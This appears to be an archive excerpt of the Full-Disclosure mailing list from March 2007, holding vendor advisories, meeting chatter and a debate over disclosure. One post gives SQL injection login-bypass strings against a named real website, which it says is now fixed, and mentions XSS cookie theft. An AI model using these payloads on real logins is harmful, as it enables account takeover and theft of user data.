http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 220242 baf029d97f703130e0089659614cd2c4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 148142 7c80067d158d37c8df818fd0e3cb4a50 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 245558 ef61b1f010f5e30f9e3a2a33f5c3b091 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_i386.deb Size/MD5: 714774 
1065d82a9d13e98b060e8a60821aaa37 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 48834962 4b279b424dc69b2c92098565bc2f0e1e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 2804560 51e13ae6b8e853b5a9a4f4a19e6a4c14 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 214292 1de8eb20071f34ffb73ea7bbb3b6b871 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 79184 16dccd3a9ba2ed7c296c45e3dff1ab23 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 9056418 341caadcba7c536c098e8681b7d7231e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 220234 f714ff5289e79c24207280050a3b4789 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 160792 b22e2fb7cbd6a0f31cb88f6439377450 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 245554 03de410c16cd2c55d8e96f3ec85c1e5c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_powerpc.deb Size/MD5: 813842 480783e72a753672776826165d343f15 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 45406734 13357d5f6bfaca2a9f7805e9d2374229 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 2804586 82083b797e91c7169135ecd5b56b4a8e 
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 211778 a97cf3939728dd25381a0d8dd01136c1
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 77622 2a41ddbdecba4d40777039b393dcb449
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 8445612 8029b90d13fa8d3f2042c0881afbe7d1
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 220242 3af481ef99ecb57a525c7585390958ef
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 150638 1383f7c03bf481b21d309ae32867969a
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 245538 767e66d0dca9b83daab8bc64a8ba2cb8
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2_sparc.deb Size/MD5: 725272 dc459aad615df84f3dab766757491c25
-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/20d53f15/attachment.bin

From dudevanwinkle at gmail.com Thu Mar 1 22:13:59 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Thu, 1 Mar 2007 17:13:59 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID:

Does anyone know if there is a NYC 2600 group? I checked the site, but couldn't find any listings.
-JP On 2/28/07, Steven McGrath wrote: > The March Chicago 2600 Meeting is near! The meeting will be Friday, > March 2nd at the Neighborhood Boys and Girls Club and will feature much > of the same usual fun that all of you have grown to expect! > > [Presentation Information] > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > - 10:00pm - How to build a public server (Maniac) > - After hours - Wii, Music, Socializing, etc. > > [General Information] > - Meeting Time: 7.00pm - Approx. 3-5am > - Meeting Date: Friday, March 2nd > - Place : 2501 W Irving Park Road, Chicago > - More Info : http://chicago2600.net > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From sniffikins at yahoo.com Fri Mar 2 08:20:14 2007 From: sniffikins at yahoo.com (Jaime Demetur) Date: Fri, 2 Mar 2007 00:20:14 -0800 (PST) Subject: [Full-disclosure] G.R.I.D.S. virus being spread by the Younger Woolwich Boyz Message-ID: <803176.31923.qm@web58904.mail.re1.yahoo.com> http://www.encyclopediadramatica.com/index.php/Younger_Woolwich_Boyz be careful out there folks, Jamie --------------------------------- Looking for earth-friendly autos? Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/596ad1dc/attachment.html From sbauer at gjl-network.net Fri Mar 2 09:23:25 2007 From: sbauer at gjl-network.net (sbauer at gjl-network.net) Date: Fri, 2 Mar 2007 10:23:25 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities Message-ID: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Author: Sebastian Bauer Web: http://blog.gjl-network.net Date: 01/12/07 Vuln. 
website: http://www.knorr.de
Vulnerability: SQL Injection (mainly login authentication bypass + any other SQL inj. possibility), XSS
Significance: Very Critical
---------------------------------------------------------
Detailed description:

The site knorr.de is using an MS SQL database server and IIS as web server. The programming language used is ASP (Active Server Pages). There is a vulnerability in the login field of the site. Since user input is not escaped, it is vulnerable to SQL injection attacks. The SQL string to authenticate the user can be escaped using single quotes. Since the database server is MS SQL it is possible to easily create a valid SQL query and ignore the rest of the SQL query by adding ;-- which ends the current query and defines the rest as a comment.

There are several ways to bypass the authentication:

1.) Provide a SQL query that will always be true. In this case the system selects the first possible user (which seems to be admin but without any special privileges, as there is no real CMS behind this). An attack like this would be:

Username: -1' or 'x'='x
Password: -1' or 'x'='x

This will log you in as the user "holgi", which seems to be the first user within the user table. The -1' is required to be sure that the result of this query (WHERE username = '-1') will be false! The first quote is used to escape from the condition given to the SQL database. The next condition 'x'='x will make sure that the condition fits any record. We don't provide a closing quote and use the already existing one in the original statement to keep a valid SQL syntax.

2.) Provide a SQL query that will return a specific username as result. Example:

Username: -1' or username = 'anyUserName';--
Password:

This results in the query returning the record of the user 'anyUserName' if it exists.
To tell MS SQL that this is the complete statement we put the ; and a -- afterwards, to tell it that the rest of the statement inside the code is to be handled as a comment and thus not interpreted. We have to deliver at least one character for the password field, because otherwise the website suggests that we create a new user and does not log us in.

3.) Provide a SQL query that will return a username which fits a special search condition. This is just a small modification of the 2nd query, which makes it possible for us to guess usernames. Example:

Username: -1' or username LIKE '%anySearchCondition%';--
Password:

This will do a normal SQL LIKE condition. You can vary it as you want. You'll get the first possible result as your login.

4.) It is also possible to manually insert new data into the database, receive information about the server and get access to a SQL shell. Those will not be described more closely in this document, as all necessary information required for this is no miracle to anyone knowing what he is doing.

Cross-Site Scripting (XSS) Vulnerabilities:

Knorr.de is using some kind of content loader using URL parameters which is vulnerable to XSS attacks. This has not been tested in detail and thus will not be described in depth in this document. Also, form data used for the Knorr forum is not escaped, which gives complete freedom for using XSS inside the forum. But since this is a moderated forum this issue can be rated as a low security risk, though it could be possible to steal the session cookie of an administrator reading an infected entry to confirm or deny it and hijack the session afterwards.
---------------------------------------------------------
Summary:

This login authentication issue is highly significant as it is possible to log in as every user we want. Knorr.de is not a website holding strictly confidential information, but you will get access to personal user data.
There may also be a risk to the system itself as it is possible to have nearly full access to the database to delete records, tables or even get access to a SQL shell. All problems found have been discussed with Unilever, the mother company of Knorr, and have been fixed before the release of this document.

From nytrokiss at gmail.com Thu Mar 1 09:17:59 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Thu, 1 Mar 2007 04:17:59 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>

Great, I cannot wait!

On 2/28/07, Steven McGrath wrote:
>
> The March Chicago 2600 Meeting is near! The meeting will be Friday,
> March 2nd at the Neighborhood Boys and Girls Club and will feature much
> of the same usual fun that all of you have grown to expect!
>
> [Presentation Information]
> - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> - 10:00pm - How to build a public server (Maniac)
> - After hours - Wii, Music, Socializing, etc.
>
> [General Information]
> - Meeting Time: 7.00pm - Approx. 3-5am
> - Meeting Date: Friday, March 2nd
> - Place : 2501 W Irving Park Road, Chicago
> - More Info : http://chicago2600.net
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
-------------- next part -------------- An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/a1d8a3ac/attachment.html

From kokanin at gmail.com Fri Mar 2 14:30:29 2007
From: kokanin at gmail.com (Knud Erik Højgaard)
Date: Fri, 2 Mar 2007 15:30:29 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

On 3/2/07, sbauer at gjl-network.net wrote:
> Significance: Very Critical

For who, the sauce-people? Not for me.

> All problems found have been discussed with Unilever, the mother
> company of Knorr and
> have been fixed before the release of this document.

Sooo, why should anyone besides you and the sauce-people care?

--
kokanin

From sbauer at gjl-network.net Fri Mar 2 14:46:22 2007
From: sbauer at gjl-network.net (Sebastian Bauer)
Date: Fri, 02 Mar 2007 15:46:22 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID: <20070302154622.zucaj3lshwccsw8g@www.gjl-network.net>

The point why I rated those problems as high risk was that due to these problems free access to all user data was possible. And problems that offer any kind of user data (including unencrypted passwords) are a significant security risk from my point of view (see the latest problems regarding StudiVZ). A lot of people are using the same password for websites, email and so on. And getting a password using this security hole makes it also possible to log in to a lot of email accounts that don't belong to you.

--
==============================
Sebastian Bauer
http://blog.gjl-network.net

Quoting Knud Erik Højgaard:
> On 3/2/07, sbauer at gjl-network.net wrote:
>
>> Significance: Very Critical
>
> For who, the sauce-people? Not for me.
>
>> All problems found have been discussed with Unilever, the mother
>> company of Knorr and
>> have been fixed before the release of this document.
>
> Sooo, why should anyone besides you and the sauce-people care?
>
> --
> kokanin

From joe.hancock at gmail.com Fri Mar 2 14:43:36 2007
From: joe.hancock at gmail.com (Joe Hancock)
Date: Fri, 2 Mar 2007 14:43:36 +0000
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

I was also going to query the way vulnerabilities are rated on a personal level here...

Significance: Double Plus Ungood

It's always nice to see problems being solved instead of just targeted, while maintaining disclosure though, Sebastian.

Regards,
Joe.

On 02/03/07, Knud Erik Højgaard wrote:
> On 3/2/07, sbauer at gjl-network.net wrote:
>
> > Significance: Very Critical
>
> For who, the sauce-people? Not for me.
>
> > All problems found have been discussed with Unilever, the mother
> > company of Knorr and
> > have been fixed before the release of this document.
>
> Sooo, why should anyone besides you and the sauce-people care?
>
> --
> kokanin
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From lcamtuf at dione.ids.pl Fri Mar 2 14:56:09 2007
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Fri, 2 Mar 2007 15:56:09 +0100 (CET)
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

> Significance: Very Critical

I'm very pro-disclosure. I do see a point in disclosing flaws in software or hardware we might use. I do see a point in reporting flaws in websites we rely on (banks, online shops).
Hey, there might even be a weak case for shaming security vendors, IT companies, or fellow professionals by exposing flaws on their sites; it's mean, but it may have some value.

But I'm puzzled as to what the point is in telling the world about a generic flaw in a soup-maker's website, where - really - the number of people even marginally affected is truly negligible? Talk to them, tell them, have it fixed; if they're nice, they might even give you a gift of some sort (a year's worth of instant noodles, I'm thinking). Blog it if you find it important to tell others about your achievement, but really, that's where it should end.

/mz

From mu-b at digit-labs.org Fri Mar 2 17:31:31 2007
From: mu-b at digit-labs.org (mu-b)
Date: Fri, 02 Mar 2007 17:31:31 +0000
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
Message-ID: <45E85F73.40401@digit-labs.org>

Attached is another exploit for MailEnable Pro/Ent <= 2.37 (including the latest). The vulnerability is a bog-standard stack based overflow in the call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).

---------------------------------------------------------------------------
(mu-b at digit-labs.org)
-------------- next part -------------- A non-text attachment was scrubbed...
Name: maildisable-v4.pl
Type: text/x-perl
Size: 4188 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/1670b40b/attachment.bin

From zdi-disclosures at 3com.com Fri Mar 2 17:56:56 2007
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Fri, 2 Mar 2007 09:56:56 -0800
Subject: [Full-disclosure] ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability
Message-ID:

ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-008.html
March 2, 2007

-- CVE ID:
CVE-2007-0774

-- Affected Vendor:
Apache

-- Affected Products:
Tomcat JK Web Server Connector 1.2.19
Tomcat JK Web Server Connector 1.2.20
Tomcat 4.1.34
Tomcat 5.5.20

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since February 26, 2007 by Digital Vaccine protection filter ID 5152. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Tomcat JK Web Server Connector. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the URI handler for the mod_jk.so library, map_uri_to_worker(), defined in native/common/jk_uri_worker_map.c. When parsing a long URL request, the URI worker map routine performs an unsafe memory copy. This results in a stack overflow condition which can be leveraged to execute arbitrary code.

-- Vendor Response:
Apache has issued an update to correct this vulnerability. More details can be found at:
http://tomcat.apache.org/connectors-doc/miscellaneous/changelog.html

-- Disclosure Timeline:
2007.02.16 - Vulnerability reported to vendor
2007.02.26 - Digital Vaccine released to TippingPoint customers
2007.03.02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

From samuschie at yahoo.de Fri Mar 2 18:24:22 2007
From: samuschie at yahoo.de (SaMuschie)
Date: Fri, 2 Mar 2007 19:24:22 +0100 (CET)
Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
Message-ID: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- - -- -
| SaMuschie Research Labs proudly presents . . .
+------------------------------------------- -- - -
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not tested)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+----------------------------------------- -- - -
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+------------------------------- - -- -

CSRF/XSS Exploit:

cat < wetpussy.html
EOF

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was founded to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -

From labs-no-reply at idefense.com Fri Mar 2 18:35:21 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 02 Mar 2007 13:35:21 -0500
Subject: [Full-disclosure] iDefense Security Advisory 03.02.07: Kaspersky AntiVirus UPX File Decompression DoS Vulnerability
Message-ID: <45E86E69.6040802@idefense.com>

Kaspersky AntiVirus UPX File Decompression DoS Vulnerability

iDefense Security Advisory 03.02.07
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 02, 2007

I. BACKGROUND

Kaspersky Antivirus is a popular client and gateway virus scanner for Unix and Windows. UPX, the ultimate packer for executables, is a method for compressing executable files to reduce their size on disk. For more information, visit the vendor's site at the following URL.

http://www.kaspersky.com/

II. DESCRIPTION

Remote exploitation of a denial of service (DoS) vulnerability in Kaspersky Lab's Antivirus could allow an attacker to conduct a DoS attack on a targeted host.

The antivirus engine is vulnerable to a DoS condition when processing an executable packed with UPX compression.
Malformed compressed data causes the decompression routine to enter an infinite loop. Specifically, a negative data offset results in the same compressed data chunk being processed endlessly.

III. ANALYSIS

Exploitation allows an attacker to conduct a DoS attack. If this attack is conducted against an e-mail gateway running Kaspersky, legitimate clients may be unable to send e-mail through the server.

The infinite loop being executed consists of a short sequence of instructions, which results in maximum CPU usage. On a client desktop, the infinite loop will render the machine nearly unusable. On a server, it severely degrades the quality of service of other applications running.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Kaspersky Labs Antivirus Engine version 6.0.1.411 for Windows and 5.5-10 for Linux. Previous versions may also be affected. Any products that use the scanning engine are also affected, which includes the Kaspersky e-mail gateway scanner.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Kaspersky Lab reports that it has fixed this vulnerability as of February 7th, 2007. In addition, they stated the following.

"There is no need to download any special patches. All installed Kaspersky Lab products are updated automatically through the regular signature-update functionality. There is no need to contact Kaspersky Lab to obtain this fix."

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

01/24/2007 Initial vendor notification
03/01/2007 Initial vendor response
03/02/2007 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From tbiehn at gmail.com Fri Mar 2 19:04:42 2007
From: tbiehn at gmail.com (T Biehn)
Date: Fri, 2 Mar 2007 14:04:42 -0500
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
In-Reply-To: <45E85F73.40401@digit-labs.org>
References: <45E85F73.40401@digit-labs.org>
Message-ID: <2d6724810703021104p2fd7f786udac77e5fe7a0d3ea@mail.gmail.com>

Stop Disclosin'

On 3/2/07, mu-b wrote:
>
> Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including
> the
> latest). The vulnerability is a bog-standard stack based overflow in the
> call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).
>
> ---------------------------------------------------------------------------
> (mu-b at digit-labs.org)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/f0b9ece9/attachment.html

From walt.williams at gmail.com Fri Mar 2 14:51:09 2007
From: walt.williams at gmail.com (Walt Williams)
Date: Fri, 2 Mar 2007 09:51:09 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To:
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID: <1dfe5f1d0703020651t4fc0342ck6d55f042de375adf@mail.gmail.com>

http://2600.meetup.com/232/

On 3/1/07, Dude VanWinkle wrote:
> Does anyone know if there is a NYC 2600 group? I checked the site, but
> couldn't find any listings..
>
> -JP
>
> On 2/28/07, Steven McGrath wrote:
> > The March Chicago 2600 Meeting is near! The meeting will be Friday,
> > March 2nd at the Neighborhood Boys and Girls Club and will feature much
> > of the same usual fun that all of you have grown to expect!
> >
> > [Presentation Information]
> > - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> > - 10:00pm - How to build a public server (Maniac)
> > - After hours - Wii, Music, Socializing, etc.
> >
> > [General Information]
> > - Meeting Time: 7.00pm - Approx. 3-5am
> > - Meeting Date: Friday, March 2nd
> > - Place : 2501 W Irving Park Road, Chicago
> > - More Info : http://chicago2600.net
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
Walt

From aluigi at autistici.org Fri Mar 2 21:43:30 2007
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 2 Mar 2007 22:43:30 +0100
Subject: [Full-disclosure] Limited format string in Netrek 2.12.0
Message-ID: <20070302224330.c9769b1b.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Netrek
              http://www.netrek.org
Versions:     <= 2.12.0 (Vanilla server)
Platforms:    *nix and Windows
Bug:          format string
Exploitation: remote (in-game)
Date:         02 Mar 2007
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Netrek is a well known real-time strategy game inspired by Star Trek.

#######################################################################

======
2) Bug
======

The Vanilla server is affected by a format string vulnerability caused by the calling of the pmessage2() function without the needed format argument. The bug is located in new_warning() and can be exploited through the locking of a player (the same attacker too) who is using a malformed nickname.

Note that the EVENTLOG switch must be enabled for exploiting this vulnerability (default is disabled).

from ntserv/warning.c:

  void new_warning(int index, const char *fmt, ...)
  {
    char temp[150];
    va_list args;

    va_start(args, fmt);
    vsprintf(temp, fmt, args);
    ...
    if (eventlog) {
      char from_str[9]="WRN->\0\0\0";
      strcat(from_str, me->p_mapchars);
      pmessage2(0, 0, from_str, me->p_no, temp);
    }

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/netrekfs.zip

#######################################################################

======
4) Fix
======

Version 2.12.1

#######################################################################

---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org

From security at mandriva.com Fri Mar 2 22:45:01 2007
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 02 Mar 2007 15:45:01 -0700
Subject: [Full-disclosure] [ MDKSA-2007:050-1 ] - Updated Firefox packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:050-1
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : mozilla-firefox
 Date    : March 2, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 1.5.0.10. This update provides the latest Firefox to correct these issues.

 Update:

 A regression was found in the latest Firefox packages provided where changes to library paths caused applications that depended on the NSS libraries (such as Thunderbird and Evolution) to fail to start or fail to load certain SSL-related security components. These new packages correct that problem and we apologize for any inconvenience the previous update may have caused.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092
 http://www.mozilla.org/security/announce/2007/mfsa2007-01.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-03.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-04.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-05.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-06.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-07.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-08.html
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From falco at gentoo.org Fri Mar 2 23:13:15 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 00:13:15 +0100
Subject: [Full-disclosure] [ GLSA 200703-04 ] Mozilla Firefox: Multiple vulnerabilities
Message-ID: <20070302231315.GA16853@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200703-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
